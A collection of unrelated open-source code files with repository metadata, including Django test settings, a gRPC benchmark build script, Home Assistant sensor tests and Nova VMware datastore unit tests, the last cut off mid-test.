"copies": "1",
"ref": "refs/heads/master",
"path": "test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "100797"
}
],
"symlink_target": ""
}
|
import os,sys
PROJECT_DIR = os.path.dirname(__file__)
sys.path.append(os.path.split(os.path.split(PROJECT_DIR)[0])[0])
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_DIR,'db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'p7t2@in067h#pf-2l2%2wa5=^n-tk56k3i(syf2mlu%&3@o&eo'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'dynamo'
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
{
"content_hash": "afd5b58cb7265e5ef916a7c2ea486889",
"timestamp": "",
"source": "github",
"line_count": 151,
"max_line_length": 122,
"avg_line_length": 34.19867549668874,
"alnum_prop": 0.6841595662277304,
"repo_name": "glenrobertson/django-dynamo",
"id": "528e2eab0248fb02bc68df80e73097c4a304aba1",
"size": "5204",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/project/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "76518"
},
{
"name": "Shell",
"bytes": "4681"
}
],
"symlink_target": ""
}
|
from google.cloud import retail_v2alpha
def sample_tune_model():
# Create a client
client = retail_v2alpha.ModelServiceClient()
# Initialize request argument(s)
request = retail_v2alpha.TuneModelRequest(
name="name_value",
)
# Make the request
operation = client.tune_model(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END retail_v2alpha_generated_ModelService_TuneModel_sync]
|
{
"content_hash": "c6f6e33d019e944f35a605a88b4ed265",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 60,
"avg_line_length": 22.869565217391305,
"alnum_prop": 0.6958174904942965,
"repo_name": "googleapis/python-retail",
"id": "7d47091931980b227a531e043e35a16230530ab9",
"size": "1905",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/retail_v2alpha_generated_model_service_tune_model_sync.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "7420556"
},
{
"name": "Shell",
"bytes": "30660"
}
],
"symlink_target": ""
}
|
""" Python utility to build opt and counters benchmarks """
import bm_constants
import argparse
import subprocess
import multiprocessing
import os
import shutil
def _args():
argp = argparse.ArgumentParser(description='Builds microbenchmarks')
argp.add_argument(
'-b',
'--benchmarks',
nargs='+',
choices=bm_constants._AVAILABLE_BENCHMARK_TESTS,
default=bm_constants._AVAILABLE_BENCHMARK_TESTS,
help='Which benchmarks to build')
argp.add_argument(
'-j',
'--jobs',
type=int,
default=multiprocessing.cpu_count(),
help='How many CPUs to dedicate to this task')
argp.add_argument(
'-n',
'--name',
type=str,
help='Unique name of this build. To be used as a handle to pass to the other bm* scripts'
)
argp.add_argument('--counters', dest='counters', action='store_true')
argp.add_argument('--no-counters', dest='counters', action='store_false')
argp.set_defaults(counters=True)
args = argp.parse_args()
assert args.name
return args
def _make_cmd(cfg, benchmarks, jobs):
return ['make'] + benchmarks + ['CONFIG=%s' % cfg, '-j', '%d' % jobs]
def build(name, benchmarks, jobs, counters):
shutil.rmtree('bm_diff_%s' % name, ignore_errors=True)
subprocess.check_call(['git', 'submodule', 'update'])
try:
subprocess.check_call(_make_cmd('opt', benchmarks, jobs))
if counters:
subprocess.check_call(_make_cmd('counters', benchmarks, jobs))
  except subprocess.CalledProcessError:
subprocess.check_call(['make', 'clean'])
subprocess.check_call(_make_cmd('opt', benchmarks, jobs))
if counters:
subprocess.check_call(_make_cmd('counters', benchmarks, jobs))
os.rename(
'bins',
'bm_diff_%s' % name,)
if __name__ == '__main__':
args = _args()
build(args.name, args.benchmarks, args.jobs, args.counters)
|
{
"content_hash": "cd367091b6a4b26e068cb0e266d7c5a4",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 97,
"avg_line_length": 30.78125,
"alnum_prop": 0.6203045685279188,
"repo_name": "deepaklukose/grpc",
"id": "a4cd61707d3876257ed724c4781cda672d45cc3e",
"size": "2574",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/profiling/microbenchmarks/bm_diff/bm_build.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14215"
},
{
"name": "C",
"bytes": "6720351"
},
{
"name": "C#",
"bytes": "1432469"
},
{
"name": "C++",
"bytes": "2008381"
},
{
"name": "CMake",
"bytes": "471360"
},
{
"name": "DTrace",
"bytes": "147"
},
{
"name": "JavaScript",
"bytes": "373818"
},
{
"name": "M4",
"bytes": "42520"
},
{
"name": "Makefile",
"bytes": "879728"
},
{
"name": "Objective-C",
"bytes": "270343"
},
{
"name": "PHP",
"bytes": "291471"
},
{
"name": "Protocol Buffer",
"bytes": "94937"
},
{
"name": "PureBasic",
"bytes": "147"
},
{
"name": "Python",
"bytes": "1356223"
},
{
"name": "Ruby",
"bytes": "661539"
},
{
"name": "Shell",
"bytes": "34711"
},
{
"name": "Swift",
"bytes": "3486"
}
],
"symlink_target": ""
}
|
import unittest
import MyPack.wrap as wrap
class TestDict(unittest.TestCase):
def test_return(self):
import numpy as np
a = np.arange(10, dtype=np.float32)
b = a.copy()*-1
self.assertEqual(45, wrap.test(a))
for i,j in zip(a,b):
self.assertEqual(i, j)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "0a28400b84c5019886b2fc3ab422fd40",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 43,
"avg_line_length": 20,
"alnum_prop": 0.5722222222222222,
"repo_name": "POFK/utilTool",
"id": "40c5db8df2bde14dbb5144c316a3cddf24e6f0b5",
"size": "397",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/setuppy_exam/tests/module1_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "2002"
},
{
"name": "C",
"bytes": "452437"
},
{
"name": "CSS",
"bytes": "28266"
},
{
"name": "Erlang",
"bytes": "1147"
},
{
"name": "HTML",
"bytes": "3490"
},
{
"name": "JavaScript",
"bytes": "1064"
},
{
"name": "Makefile",
"bytes": "7222"
},
{
"name": "Perl",
"bytes": "40891"
},
{
"name": "Python",
"bytes": "399043"
},
{
"name": "Ruby",
"bytes": "5631"
},
{
"name": "Shell",
"bytes": "9717"
},
{
"name": "Vim script",
"bytes": "2832275"
},
{
"name": "Visual Basic",
"bytes": "94759"
}
],
"symlink_target": ""
}
|
from django.utils.module_loading import autodiscover_modules
from . import base
def autodiscover():
autodiscover_modules('social', register_to=base)
default_app_config = 'socializr.apps.SocializrConfig'
|
{
"content_hash": "bb9594931df79f6c89459208f1515710",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 60,
"avg_line_length": 21.2,
"alnum_prop": 0.7783018867924528,
"repo_name": "albertoconnor/django-socializr",
"id": "69593e763a8806ab9a30e6c850a60027e51245cb",
"size": "213",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "socializr/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20364"
}
],
"symlink_target": ""
}
|
from kubeflow.fairing.preprocessors.base import BasePreProcessor
def test_checking_reqs_file_found_use_case_with_input_files():
input_files = ["foo", "bar", "/foo/bar", "requirements.txt"]
preprocessor = BasePreProcessor(input_files=input_files)
assert preprocessor.is_requirements_txt_file_present()
def test_checking_reqs_file_found_use_case_with_output_map():
output_map = {
"foo": "/app/bar",
"/foo/bar": "/app/requirements.txt"
}
preprocessor = BasePreProcessor(output_map=output_map)
assert preprocessor.is_requirements_txt_file_present()
def test_checking_reqs_file_not_found_use_case_with_input_files():
input_files = ["foo", "bar", "/foo/bar", "/foo/requirements.txt"]
preprocessor = BasePreProcessor(input_files=input_files)
assert not preprocessor.is_requirements_txt_file_present()
def test_checking_reqs_file_not_found_use_case_with_output_map():
output_map = {
"foo": "/app/bar",
"/foo/bar": "/app/foo/requirements.txt"
}
preprocessor = BasePreProcessor(output_map=output_map)
assert not preprocessor.is_requirements_txt_file_present()
|
{
"content_hash": "fe611c731190aa1171b3da9b799ae1e9",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 69,
"avg_line_length": 36.96774193548387,
"alnum_prop": 0.6980802792321117,
"repo_name": "kubeflow/fairing",
"id": "12b82f91d0ff375ccee98c4cdb0012b8b537c53a",
"size": "1146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/preprocessors/test_base_preprocessor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2103"
},
{
"name": "Jsonnet",
"bytes": "2440311"
},
{
"name": "Jupyter Notebook",
"bytes": "1573"
},
{
"name": "Python",
"bytes": "523314"
},
{
"name": "Shell",
"bytes": "439"
}
],
"symlink_target": ""
}
|
"""The tests for the Google Wifi platform."""
import unittest
from unittest.mock import patch, Mock
from datetime import datetime, timedelta
import requests_mock
from homeassistant import core as ha
from homeassistant.setup import setup_component
import homeassistant.components.google_wifi.sensor as google_wifi
from homeassistant.const import STATE_UNKNOWN
from homeassistant.util import dt as dt_util
from tests.common import get_test_home_assistant, assert_setup_component
NAME = 'foo'
MOCK_DATA = ('{"software": {"softwareVersion":"initial",'
'"updateNewVersion":"initial"},'
'"system": {"uptime":86400},'
'"wan": {"localIpAddress":"initial", "online":true,'
'"ipAddress":true}}')
MOCK_DATA_NEXT = ('{"software": {"softwareVersion":"next",'
'"updateNewVersion":"0.0.0.0"},'
'"system": {"uptime":172800},'
'"wan": {"localIpAddress":"next", "online":false,'
'"ipAddress":false}}')
MOCK_DATA_MISSING = ('{"software": {},'
'"system": {},'
'"wan": {}}')
class TestGoogleWifiSetup(unittest.TestCase):
"""Tests for setting up the Google Wifi sensor platform."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
@requests_mock.Mocker()
def test_setup_minimum(self, mock_req):
"""Test setup with minimum configuration."""
resource = '{}{}{}'.format(
'http://', google_wifi.DEFAULT_HOST, google_wifi.ENDPOINT)
mock_req.get(resource, status_code=200)
assert setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'google_wifi',
'monitored_conditions': ['uptime']
}
})
assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_get(self, mock_req):
"""Test setup with full configuration."""
resource = '{}{}{}'.format(
'http://', 'localhost', google_wifi.ENDPOINT)
mock_req.get(resource, status_code=200)
assert setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'google_wifi',
'host': 'localhost',
'name': 'Test Wifi',
'monitored_conditions': ['current_version',
'new_version',
'uptime',
'last_restart',
'local_ip',
'status']
}
})
assert_setup_component(6, 'sensor')
class TestGoogleWifiSensor(unittest.TestCase):
"""Tests for Google Wifi sensor platform."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
with requests_mock.Mocker() as mock_req:
self.setup_api(MOCK_DATA, mock_req)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def setup_api(self, data, mock_req):
"""Set up API with fake data."""
resource = '{}{}{}'.format(
'http://', 'localhost', google_wifi.ENDPOINT)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
mock_req.get(resource, text=data, status_code=200)
conditions = google_wifi.MONITORED_CONDITIONS.keys()
self.api = google_wifi.GoogleWifiAPI("localhost", conditions)
self.name = NAME
self.sensor_dict = dict()
for condition, cond_list in google_wifi.MONITORED_CONDITIONS.items():
sensor = google_wifi.GoogleWifiSensor(
self.api, self.name, condition)
name = '{}_{}'.format(self.name, condition)
units = cond_list[1]
icon = cond_list[2]
self.sensor_dict[condition] = {
'sensor': sensor,
'name': name,
'units': units,
'icon': icon
}
def fake_delay(self, ha_delay):
"""Fake delay to prevent update throttle."""
hass_now = dt_util.utcnow()
shifted_time = hass_now + timedelta(seconds=ha_delay)
self.hass.bus.fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: shifted_time})
def test_name(self):
"""Test the name."""
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
test_name = self.sensor_dict[name]['name']
assert test_name == sensor.name
def test_unit_of_measurement(self):
"""Test the unit of measurement."""
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
assert \
self.sensor_dict[name]['units'] == sensor.unit_of_measurement
def test_icon(self):
"""Test the icon."""
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
assert self.sensor_dict[name]['icon'] == sensor.icon
@requests_mock.Mocker()
def test_state(self, mock_req):
"""Test the initial state."""
self.setup_api(MOCK_DATA, mock_req)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
if name == google_wifi.ATTR_LAST_RESTART:
assert '1969-12-31 00:00:00' == sensor.state
elif name == google_wifi.ATTR_UPTIME:
assert 1 == sensor.state
elif name == google_wifi.ATTR_STATUS:
assert 'Online' == sensor.state
else:
assert 'initial' == sensor.state
@requests_mock.Mocker()
def test_update_when_value_is_none(self, mock_req):
"""Test state gets updated to unknown when sensor returns no data."""
self.setup_api(None, mock_req)
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
assert sensor.state is None
@requests_mock.Mocker()
def test_update_when_value_changed(self, mock_req):
"""Test state gets updated when sensor returns a new status."""
self.setup_api(MOCK_DATA_NEXT, mock_req)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
if name == google_wifi.ATTR_LAST_RESTART:
assert '1969-12-30 00:00:00' == sensor.state
elif name == google_wifi.ATTR_UPTIME:
assert 2 == sensor.state
elif name == google_wifi.ATTR_STATUS:
assert 'Offline' == sensor.state
elif name == google_wifi.ATTR_NEW_VERSION:
assert 'Latest' == sensor.state
elif name == google_wifi.ATTR_LOCAL_IP:
assert STATE_UNKNOWN == sensor.state
else:
assert 'next' == sensor.state
@requests_mock.Mocker()
def test_when_api_data_missing(self, mock_req):
"""Test state logs an error when data is missing."""
self.setup_api(MOCK_DATA_MISSING, mock_req)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
assert STATE_UNKNOWN == sensor.state
def test_update_when_unavailable(self):
"""Test state updates when Google Wifi unavailable."""
self.api.update = Mock('google_wifi.GoogleWifiAPI.update',
side_effect=self.update_side_effect())
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
sensor.update()
assert sensor.state is None
def update_side_effect(self):
"""Mock representation of update function."""
self.api.data = None
self.api.available = False
|
{
"content_hash": "793de3b9c3fe19e21134796122e77b21",
"timestamp": "",
"source": "github",
"line_count": 221,
"max_line_length": 78,
"avg_line_length": 39.425339366515836,
"alnum_prop": 0.5478021347411913,
"repo_name": "jnewland/home-assistant",
"id": "ee0cf3b0658653e5445a89239205627d7fcd2dfc",
"size": "8713",
"binary": false,
"copies": "8",
"ref": "refs/heads/ci",
"path": "tests/components/google_wifi/test_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1081"
},
{
"name": "Python",
"bytes": "15240512"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17862"
}
],
"symlink_target": ""
}
|
import tkinter as tk
import constants
import circle
import utils
class simulationGUI(tk.Frame):
def __init__(self, parent, beObj):
const = constants.simulationWindow
self.beObj = beObj
self.canvas = tk.Canvas(parent, bg=const.background,
width=const.width, height=const.height)
self.canvasSizes = (self.canvas.winfo_reqwidth(),
self.canvas.winfo_reqheight())
self.placeTheCircles()
self.canvas.grid(row=const.rowOrder, column=const.colOrder,
sticky=const.sticky)
self.canvas.bind("<Button-1>", self.click)
# For the interactive gui
def click(self, event):
print("clicked at", event.x, event.y)
self.beObj.increment()
print(self.beObj)
def addCircle(self, obj):
x, y = obj.pos
r = obj.radius
self.canvas.create_oval(x - r, y - r, x + r, y + r,
outline="red", fill="green")
def placeTheCircles(self):
placed, idx = [circle.Circle(self.canvasSizes)], 1
while idx < constants.bubbles.numberOfCircles:
newCircle = circle.Circle(self.canvasSizes)
isOK = True
            for placedCircle in placed:
                if utils.circlesIsOverlapCheck(placedCircle, newCircle):
                    isOK = False
                    break
if isOK:
self.addCircle(newCircle)
placed.append(newCircle)
idx += 1
|
{
"content_hash": "58fa21420cac78a55c0f43417f52c65c",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 71,
"avg_line_length": 33.17391304347826,
"alnum_prop": 0.5504587155963303,
"repo_name": "dekespo/EVSTimulator",
"id": "5ab0f7062b160c65c896f7d3ae0744dce2bba592",
"size": "1526",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gui/simulation.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1843"
},
{
"name": "Python",
"bytes": "13846"
},
{
"name": "Shell",
"bytes": "44"
}
],
"symlink_target": ""
}
|
import re
import mock
from oslo_utils import units
from oslo_vmware import exceptions as vexc
from oslo_vmware.objects import datastore as ds_obj
from nova import exception
from nova import test
from nova.tests.unit.virt.vmwareapi import fake
from nova.virt.vmwareapi import ds_util
class DsUtilTestCase(test.NoDBTestCase):
def setUp(self):
super(DsUtilTestCase, self).setUp()
self.session = fake.FakeSession()
self.flags(api_retry_count=1, group='vmware')
fake.reset()
def tearDown(self):
super(DsUtilTestCase, self).tearDown()
fake.reset()
def test_get_datacenter_ref(self):
with mock.patch.object(self.session, '_call_method') as call_method:
ds_util.get_datacenter_ref(self.session, "datacenter")
call_method.assert_called_once_with(
self.session.vim,
"FindByInventoryPath",
self.session.vim.service_content.searchIndex,
inventoryPath="datacenter")
def test_file_delete(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('DeleteDatastoreFile_Task', method)
name = kwargs.get('name')
self.assertEqual('[ds] fake/path', name)
datacenter = kwargs.get('datacenter')
self.assertEqual('fake-dc-ref', datacenter)
return 'fake_delete_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
ds_util.file_delete(self.session,
ds_path, 'fake-dc-ref')
_wait_for_task.assert_has_calls([
mock.call('fake_delete_task')])
def test_file_copy(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('CopyDatastoreFile_Task', method)
src_name = kwargs.get('sourceName')
self.assertEqual('[ds] fake/path/src_file', src_name)
src_dc_ref = kwargs.get('sourceDatacenter')
self.assertEqual('fake-src-dc-ref', src_dc_ref)
dst_name = kwargs.get('destinationName')
self.assertEqual('[ds] fake/path/dst_file', dst_name)
dst_dc_ref = kwargs.get('destinationDatacenter')
self.assertEqual('fake-dst-dc-ref', dst_dc_ref)
return 'fake_copy_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
src_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'src_file')
dst_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'dst_file')
ds_util.file_copy(self.session,
str(src_ds_path), 'fake-src-dc-ref',
str(dst_ds_path), 'fake-dst-dc-ref')
_wait_for_task.assert_has_calls([
mock.call('fake_copy_task')])
def test_file_move(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('MoveDatastoreFile_Task', method)
sourceName = kwargs.get('sourceName')
self.assertEqual('[ds] tmp/src', sourceName)
destinationName = kwargs.get('destinationName')
self.assertEqual('[ds] base/dst', destinationName)
sourceDatacenter = kwargs.get('sourceDatacenter')
self.assertEqual('fake-dc-ref', sourceDatacenter)
destinationDatacenter = kwargs.get('destinationDatacenter')
self.assertEqual('fake-dc-ref', destinationDatacenter)
return 'fake_move_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
src_ds_path = ds_obj.DatastorePath('ds', 'tmp/src')
dst_ds_path = ds_obj.DatastorePath('ds', 'base/dst')
ds_util.file_move(self.session,
'fake-dc-ref', src_ds_path, dst_ds_path)
_wait_for_task.assert_has_calls([
mock.call('fake_move_task')])
def test_disk_move(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('MoveVirtualDisk_Task', method)
src_name = kwargs.get('sourceName')
self.assertEqual('[ds] tmp/src', src_name)
dest_name = kwargs.get('destName')
self.assertEqual('[ds] base/dst', dest_name)
src_datacenter = kwargs.get('sourceDatacenter')
self.assertEqual('fake-dc-ref', src_datacenter)
dest_datacenter = kwargs.get('destDatacenter')
self.assertEqual('fake-dc-ref', dest_datacenter)
return 'fake_move_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
ds_util.disk_move(self.session,
'fake-dc-ref', '[ds] tmp/src', '[ds] base/dst')
_wait_for_task.assert_has_calls([
mock.call('fake_move_task')])
def test_disk_copy(self):
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
return_value=mock.sentinel.cm)
) as (_wait_for_task, _call_method):
ds_util.disk_copy(self.session, mock.sentinel.dc_ref,
mock.sentinel.source_ds, mock.sentinel.dest_ds)
_wait_for_task.assert_called_once_with(mock.sentinel.cm)
_call_method.assert_called_once_with(
mock.ANY, 'CopyVirtualDisk_Task', 'VirtualDiskManager',
sourceName='sentinel.source_ds',
destDatacenter=mock.sentinel.dc_ref,
sourceDatacenter=mock.sentinel.dc_ref, force=False,
destName='sentinel.dest_ds')
def test_disk_delete(self):
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
return_value=mock.sentinel.cm)
) as (_wait_for_task, _call_method):
ds_util.disk_delete(self.session,
'fake-dc-ref', '[ds] tmp/disk.vmdk')
_wait_for_task.assert_called_once_with(mock.sentinel.cm)
_call_method.assert_called_once_with(
mock.ANY, 'DeleteVirtualDisk_Task', 'VirtualDiskManager',
datacenter='fake-dc-ref', name='[ds] tmp/disk.vmdk')
def test_mkdir(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('MakeDirectory', method)
name = kwargs.get('name')
self.assertEqual('[ds] fake/path', name)
datacenter = kwargs.get('datacenter')
self.assertEqual('fake-dc-ref', datacenter)
createParentDirectories = kwargs.get('createParentDirectories')
self.assertTrue(createParentDirectories)
with mock.patch.object(self.session, '_call_method',
fake_call_method):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
ds_util.mkdir(self.session, ds_path, 'fake-dc-ref')
def test_file_exists(self):
def fake_call_method(module, method, *args, **kwargs):
if method == 'SearchDatastore_Task':
ds_browser = args[0]
self.assertEqual('fake-browser', ds_browser)
datastorePath = kwargs.get('datastorePath')
self.assertEqual('[ds] fake/path', datastorePath)
return 'fake_exists_task'
# Should never get here
self.fail()
def fake_wait_for_task(task_ref):
if task_ref == 'fake_exists_task':
result_file = fake.DataObject()
result_file.path = 'fake-file'
result = fake.DataObject()
result.file = [result_file]
result.path = '[ds] fake/path'
task_info = fake.DataObject()
task_info.result = result
return task_info
# Should never get here
self.fail()
with test.nested(
mock.patch.object(self.session, '_call_method',
fake_call_method),
mock.patch.object(self.session, '_wait_for_task',
fake_wait_for_task)):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
file_exists = ds_util.file_exists(self.session,
'fake-browser', ds_path, 'fake-file')
self.assertTrue(file_exists)
def test_file_exists_fails(self):
def fake_call_method(module, method, *args, **kwargs):
if method == 'SearchDatastore_Task':
return 'fake_exists_task'
# Should never get here
self.fail()
def fake_wait_for_task(task_ref):
if task_ref == 'fake_exists_task':
raise vexc.FileNotFoundException()
# Should never get here
self.fail()
with test.nested(
mock.patch.object(self.session, '_call_method',
fake_call_method),
mock.patch.object(self.session, '_wait_for_task',
fake_wait_for_task)):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
file_exists = ds_util.file_exists(self.session,
'fake-browser', ds_path, 'fake-file')
self.assertFalse(file_exists)
def _mock_get_datastore_calls(self, *datastores):
"""Mock vim_util calls made by get_datastore."""
datastores_i = [None]
# For the moment, at least, this list of datastores is simply passed to
# get_properties_for_a_collection_of_objects, which we mock below. We
# don't need to over-complicate the fake function by worrying about its
# contents.
fake_ds_list = ['fake-ds']
def fake_call_method(module, method, *args, **kwargs):
# Mock the call which returns a list of datastores for the cluster
if (module == ds_util.vutil and
method == 'get_object_property' and
args == ('fake-cluster', 'datastore')):
fake_ds_mor = fake.DataObject()
fake_ds_mor.ManagedObjectReference = fake_ds_list
return fake_ds_mor
# Return the datastore result sets we were passed in, in the order
# given
if (module == ds_util.vim_util and
method == 'get_properties_for_a_collection_of_objects' and
args[0] == 'Datastore' and
args[1] == fake_ds_list):
# Start a new iterator over given datastores
datastores_i[0] = iter(datastores)
return next(datastores_i[0])
# Continue returning results from the current iterator.
if (module == ds_util.vutil and
method == 'continue_retrieval'):
try:
return next(datastores_i[0])
except StopIteration:
return None
if (method == 'continue_retrieval' or
method == 'cancel_retrieval'):
return
# Sentinel that get_datastore's use of vim has changed
self.fail('Unexpected vim call in get_datastore: %s' % method)
return mock.patch.object(self.session, '_call_method',
side_effect=fake_call_method)
def test_get_datastore(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore())
fake_objects.add_object(fake.Datastore("fake-ds-2", 2048, 1000,
False, "normal"))
fake_objects.add_object(fake.Datastore("fake-ds-3", 4096, 2000,
True, "inMaintenance"))
with self._mock_get_datastore_calls(fake_objects):
